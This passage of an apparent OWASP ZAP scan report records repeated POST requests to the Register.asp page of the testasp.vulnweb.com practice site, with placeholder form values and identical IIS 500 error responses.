<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
